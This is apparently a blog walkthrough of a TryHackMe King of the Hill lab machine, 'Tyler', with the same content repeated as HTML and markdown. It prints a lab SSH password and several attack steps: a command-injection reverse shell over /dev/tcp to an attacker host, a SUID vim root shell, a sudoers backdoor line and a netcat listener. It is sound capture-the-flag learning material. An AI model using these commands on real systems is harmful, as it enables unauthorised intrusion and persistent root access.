<h1 id="heading-koth-tyler">KOTH TYLER</h1>
<h1 id="heading-ip-1010243130">IP: <code>10.10.243.130</code></h1>
<h3 id="heading-open-ports-via-nmap">Open Ports Via Nmap -</h3>
<p><code>nmap -sC -sV 10.10.243.130</code></p>
<pre><code class="lang-plaintext">22
80
139
445
3306
5000
8080
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1674577791136/8079fa66-7645-491e-99f8-5d7b55f13491.png" alt class="image--center mx-auto" /></p>
<h5 id="heading-subdirectories-via-gobuster">Subdirectories Via Gobuster -</h5>
<p><code>gobuster dir -u</code><a target="_blank" href="http://10.10.243.130"><code>http://10.10.243.130</code></a><code>-w /usr/share/dirbuster/directory-list-2.3-medium.txt</code></p>
<pre><code class="lang-plaintext">/upload
/betatest
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1674577876046/c7af6e32-d98a-4b8d-ad5c-9fd40bdfddb1.png" alt class="image--center mx-auto" /></p>
<h5 id="heading-initial-access">Initial access -</h5>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1674577921959/110d5e55-513c-402e-9524-dae0184c5ab6.png" alt class="image--center mx-auto" /></p>
<pre><code class="lang-plaintext">smbclient //tyler.thm/public
</code></pre>
<p><code>we can get narrator's ssh password from here</code></p>
<p>username: narrator<br />password: X8JEETQmf3hkS65f</p>
<h5 id="heading-privilege-escalation-of-user-narrator">Privilege escalation of user <code>narrator</code></h5>
<p><code>find / -perm -4000 2&gt;/dev/null</code></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1674577985290/da40184b-8762-4796-a9f3-3483ccdf3d72.png" alt class="image--center mx-auto" /></p>
<pre><code class="lang-plaintext">vim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
</code></pre>
<h3 id="heading-subdirectory-betatest">subdirectory - <code>betatest</code></h3>
<p><code>tdurden;bash -i &gt;&amp; /dev/tcp/&lt;ip&gt;/&lt;port&gt; 0&gt;&amp;1</code></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1674578006586/b22b0b2e-1fdd-407e-a04a-6938f006ef28.png" alt class="image--center mx-auto" /></p>
<blockquote>
<p>Same Priv-Esc as of narrator using vim</p>
</blockquote>
<h5 id="heading-to-get-full-root-access">To get full root access -</h5>
<pre><code class="lang-plaintext">echo "tdurden ALL=(ALL:ALL) NOPASSWD:ALL" &gt;&gt; /etc/sudoers
</code></pre>
<p>Then just do, <code>sudo bash</code> voilà you're root</p>
<h5 id="heading-upload-a-python-rev-shell-on-port-5000">Upload a <code>python</code> rev-shell on PORT <code>5000</code></h5>
<p><a target="_blank" href="http://tyler.thm:5000%EF%BF%BC"><code>http://tyler.thm:5000</code>  
</a></p>
<pre><code class="lang-plaintext">nc -lnvp &lt;port&gt;
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1674578045684/c38dd008-1d6f-4c49-a340-d6c1250c67ac.png" alt class="image--center mx-auto" /></p>


# KOTH TYLER

# IP: `10.10.243.130`

### Open Ports Via Nmap -

`nmap -sC -sV 10.10.243.130`

```plaintext
22
80
139
445
3306
5000
8080
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1674577791136/8079fa66-7645-491e-99f8-5d7b55f13491.png align="center")

##### Subdirectories Via Gobuster -

`gobuster dir -u`[`http://10.10.243.130`](http://10.10.243.130)`-w /usr/share/dirbuster/directory-list-2.3-medium.txt`

```plaintext
/upload
/betatest
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1674577876046/c7af6e32-d98a-4b8d-ad5c-9fd40bdfddb1.png align="center")

##### Initial access -

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1674577921959/110d5e55-513c-402e-9524-dae0184c5ab6.png align="center")

```plaintext
smbclient //tyler.thm/public
```

`we can get narrator's ssh password from here`

username: narrator  
password: X8JEETQmf3hkS65f

##### Privilege escalation of user `narrator`

`find / -perm -4000 2>/dev/null`

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1674577985290/da40184b-8762-4796-a9f3-3483ccdf3d72.png align="center")

```plaintext
vim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
```

### subdirectory - `betatest`

`tdurden;bash -i >& /dev/tcp/<ip>/<port> 0>&1`

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1674578006586/b22b0b2e-1fdd-407e-a04a-6938f006ef28.png align="center")

> Same Priv-Esc as of narrator using vim

##### To get full root access -

```plaintext
echo "tdurden ALL=(ALL:ALL) NOPASSWD:ALL" >> /etc/sudoers
```

Then just do, `sudo bash` voilà you're root

##### Upload a `python` rev-shell on PORT `5000`

[`http://tyler.thm:5000`  
](http://tyler.thm:5000%EF%BF%BC)

```plaintext
nc -lnvp <port>
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1674578045684/c38dd008-1d6f-4c49-a340-d6c1250c67ac.png align="center")

TryHackMe KoTH Machine Tyler Writeup

Tryhackme KoTH Machine Tyler

KOTH TYLER

IP: 10.10.243.130

Open Ports Via Nmap -

Subdirectories Via Gobuster -

Initial access -

Privilege escalation of user narrator

subdirectory - betatest

To get full root access -

Upload a python rev-shell on PORT 5000

postponing-sleep, it's a hacker life for me...★


Blog - h00dy

Tryhackme KoTH Machine Tyler

Table of contents

KOTH TYLER

IP: 10.10.243.130

Open Ports Via Nmap -

Subdirectories Via Gobuster -

Initial access -

Privilege escalation of user narrator

subdirectory - betatest

To get full root access -

Upload a python rev-shell on PORT 5000

IP: `10.10.243.130`

Privilege escalation of user `narrator`

subdirectory - `betatest`

Upload a `python` rev-shell on PORT `5000`